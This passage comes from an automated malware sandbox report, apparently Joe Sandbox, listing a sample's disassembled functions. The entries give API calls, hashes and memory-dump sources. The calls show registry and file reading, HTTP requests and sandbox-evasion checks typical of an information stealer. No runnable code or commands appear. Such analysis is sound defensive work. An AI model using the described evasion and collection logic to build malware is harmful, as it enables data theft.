                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 02D27944
                                                                                    • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 02D27965
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 02D2796F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                    • String ID: Windows 11
                                                                                    • API String ID: 3225020163-2517555085
                                                                                    • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                                                    • Instruction ID: 69d4963d368854ef83568f91c9463ebbe42b518c55cbfd59f4da9e68acd83c54
                                                                                    • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                                                    • Instruction Fuzzy Hash: C2012CB9A80304BBEB10DBE4DD49FADB7B9EB48705F005155FA05A6280D6749904CB51
                                                                                    Function 00417690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,02E32968,00000000,00020119,00000000), ref: 004176DD
                                                                                    • RegQueryValueExA.ADVAPI32(00000000,02E39A28,00000000,00000000,?,000000FF), ref: 004176FE
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                    • String ID: Windows 11
                                                                                    • API String ID: 3466090806-2517555085
                                                                                    • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                                                    • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                                                                    • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                                                    • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                                                                    Function 004192E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                                                                    • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleSize
                                                                                    • String ID: :A$:A
                                                                                    • API String ID: 1378416451-1974578005
                                                                                    • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                    • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                                                                    • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                    • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                                                                    Function 02D17537 Relevance: 9.1, APIs: 6, Instructions: 149registrymemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02D175A1
                                                                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02D17618
                                                                                    • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 02D17674
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02D176B9
                                                                                    • HeapFree.KERNEL32(00000000), ref: 02D176C0
                                                                                      • Part of subcall function 02D194A7: vsprintf_s.MSVCRT ref: 02D194C2
                                                                                    • task.LIBCPMTD ref: 02D177BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                                                                    • String ID:
                                                                                    • API String ID: 700816787-0
                                                                                    • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                                                    • Instruction ID: c449a7202a285c3f670833c2f07d78d60e3859507ed4bcfef5079f4f11eb4ccc
                                                                                    • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                                                    • Instruction Fuzzy Hash: E1614DB5900268ABEB24DB50DC54FE9B7B9FF44300F0081E9E689A6650DB709FC5CFA4
                                                                                    Function 02D25527 Relevance: 9.1, APIs: 6, Instructions: 138stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D164E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 02D16548
                                                                                      • Part of subcall function 02D164E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 02D1656A
                                                                                      • Part of subcall function 02D164E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02D1659C
                                                                                      • Part of subcall function 02D164E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02D165EC
                                                                                      • Part of subcall function 02D164E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02D16626
                                                                                      • Part of subcall function 02D164E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02D16638
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 02D2557F
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D25596
                                                                                      • Part of subcall function 02D29097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02D290B9
                                                                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 02D255CB
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D255EA
                                                                                    • strtok.MSVCRT(00000000,?), ref: 02D25605
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D25615
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                                                    • String ID:
                                                                                    • API String ID: 3532888709-0
                                                                                    • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                                                    • Instruction ID: c394aa9606aff78ebadc60e1b54d17f1ec31088519c40ac902ad48bb5dfd0d49
                                                                                    • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                                                    • Instruction Fuzzy Hash: D751C870914258EBCB18EF60DE95EED7776EF20709F904018E90A66690EB34AF49CF61
                                                                                    Function 02D27337 Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 02D27345
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,02D27574,004205BD), ref: 02D27383
                                                                                    • memset.MSVCRT ref: 02D273D1
                                                                                    • ??_V@YAXPAX@Z.MSVCRT(?), ref: 02D27525
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: OpenProcesslstrcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 224852652-0
                                                                                    • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                                                    • Instruction ID: d4d80cb116c6d862c3a43c39d7ed73e299a2e9324bccb451ff0d91f6bf4b9c2f
                                                                                    • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                                                    • Instruction Fuzzy Hash: 33515FB0D00229DBEB24EB90DC84BEDF7B5EF54309F5081A9D115A6281EB746E88CF64
                                                                                    Function 02D24317 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 02D2433C
                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 02D2435B
                                                                                    • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 02D2437F
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02D24389
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D243AE
                                                                                    • lstrcat.KERNEL32(?,0064A168), ref: 02D243C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                    • String ID:
                                                                                    • API String ID: 2623679115-0
                                                                                    • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                                                    • Instruction ID: a27dfc138f42c65fc57bcbea4d2fb68d552afb0308b3a362588c39b0c0df0e95
                                                                                    • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                                                    • Instruction Fuzzy Hash: A94166B6940118BBDB15EBE0DC45FEE737AEF59300F0045586B2997280EA759A8CCFE1
                                                                                    Function 004140B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 004140D5
                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,02E3A2F0,00000000,00020119,?), ref: 004140F4
                                                                                    • RegQueryValueExA.ADVAPI32(?,02E39CC8,00000000,00000000,00000000,000000FF), ref: 00414118
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00414122
                                                                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                                                                    • lstrcatA.KERNEL32(?,02E3AF90), ref: 0041415B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                    • String ID:
                                                                                    • API String ID: 2623679115-0
                                                                                    • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                                                    • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                                                                    • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                                                    • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                                                                    Function 00413560 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strtok_s.MSVCRT ref: 00413588
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • strtok_s.MSVCRT ref: 004136D1
                                                                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E342B0,?,0042110C,?,00000000), ref: 0041A82B
                                                                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpystrtok_s$lstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 3184129880-0
                                                                                    • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                                                    • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                                                                    • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                                                    • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                                                                    Function 02D26C57 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 02D29B08
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 02D29B21
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 02D29B39
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 02D29B51
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 02D29B6A
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 02D29B82
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 02D29B9A
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 02D29BB3
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 02D29BCB
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 02D29BE3
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 02D29BFC
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 02D29C14
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 02D29C2C
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 02D29C45
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D11437: ExitProcess.KERNEL32 ref: 02D11478
                                                                                      • Part of subcall function 02D113C7: GetSystemInfo.KERNEL32(?), ref: 02D113D1
                                                                                      • Part of subcall function 02D113C7: ExitProcess.KERNEL32 ref: 02D113E5
                                                                                      • Part of subcall function 02D11377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 02D11392
                                                                                      • Part of subcall function 02D11377: VirtualAllocExNuma.KERNEL32(00000000), ref: 02D11399
                                                                                      • Part of subcall function 02D11377: ExitProcess.KERNEL32 ref: 02D113AA
                                                                                      • Part of subcall function 02D11487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 02D114A5
                                                                                      • Part of subcall function 02D11487: __aulldiv.LIBCMT ref: 02D114BF
                                                                                      • Part of subcall function 02D11487: __aulldiv.LIBCMT ref: 02D114CD
                                                                                      • Part of subcall function 02D11487: ExitProcess.KERNEL32 ref: 02D114FB
                                                                                      • Part of subcall function 02D269D7: GetUserDefaultLangID.KERNEL32 ref: 02D269DB
                                                                                      • Part of subcall function 02D113F7: ExitProcess.KERNEL32 ref: 02D1142D
                                                                                      • Part of subcall function 02D27AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02D1141E), ref: 02D27AE7
                                                                                      • Part of subcall function 02D27AB7: RtlAllocateHeap.NTDLL(00000000), ref: 02D27AEE
                                                                                      • Part of subcall function 02D27AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 02D27B06
                                                                                      • Part of subcall function 02D27B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D27B77
                                                                                      • Part of subcall function 02D27B47: RtlAllocateHeap.NTDLL(00000000), ref: 02D27B7E
                                                                                      • Part of subcall function 02D27B47: GetComputerNameA.KERNEL32(?,00000104), ref: 02D27B96
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02D26D31
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D26D4F
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D26D60
                                                                                    • Sleep.KERNEL32(00001770), ref: 02D26D6B
                                                                                    • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02D26D81
                                                                                    • ExitProcess.KERNEL32 ref: 02D26D89
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2525456742-0
                                                                                    • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                                                    • Instruction ID: dd3d1a1904c65a4a50e32f8e0ac24bafcb932753d21c29096026174abc46b2ab
                                                                                    • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                                                    • Instruction Fuzzy Hash: A3311875A40228ABDB04FBE0EC55BED737AEF64708F501529A102A6690EF749E08CE71
                                                                                    Function 02D19C27 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02D19C53
                                                                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 02D19C78
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 02D19C98
                                                                                    • ReadFile.KERNEL32(000000FF,?,00000000,02D116F6,00000000), ref: 02D19CC1
                                                                                    • LocalFree.KERNEL32(02D116F6), ref: 02D19CF7
                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 02D19D01
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                    • String ID:
                                                                                    • API String ID: 2311089104-0
                                                                                    • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                                                    • Instruction ID: 85a160cbbe458eb841b59fbd1574dde4fa6201c55efedc64324a95eb424359c1
                                                                                    • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                                                    • Instruction Fuzzy Hash: 673105B8A00209EFDB14CF94D8A4BEE77F6EB48304F108158E911A7390C774AA41CFA1
                                                                                    Function 004099C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                    • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                    • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                    • String ID:
                                                                                    • API String ID: 2311089104-0
                                                                                    • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                                                    • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                                                                    • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                                                    • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                                                                    Function 02D2CC45 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 02D2CC51
                                                                                      • Part of subcall function 02D2C206: __getptd_noexit.LIBCMT ref: 02D2C209
                                                                                      • Part of subcall function 02D2C206: __amsg_exit.LIBCMT ref: 02D2C216
                                                                                    • __amsg_exit.LIBCMT ref: 02D2CC71
                                                                                    • __lock.LIBCMT ref: 02D2CC81
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 02D2CC9E
                                                                                    • free.MSVCRT ref: 02D2CCB1
                                                                                    • InterlockedIncrement.KERNEL32(0042B980), ref: 02D2CCC9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                                                    • String ID:
                                                                                    • API String ID: 634100517-0
                                                                                    • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                                                    • Instruction ID: 34f3e2ae5f141fa5ceb73dc80842e98c018023cdd56c2bda10b94e2a7e68dcb8
                                                                                    • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                                                    • Instruction Fuzzy Hash: 71010031A10B34ABCB20AB64944475C7360FF3071CF028127DC10673A0CB646C89EFE9
                                                                                    Function 0041C9DE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 0041C9EA
                                                                                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                                                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                                                    • __amsg_exit.LIBCMT ref: 0041CA0A
                                                                                    • __lock.LIBCMT ref: 0041CA1A
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                                                    • free.MSVCRT ref: 0041CA4A
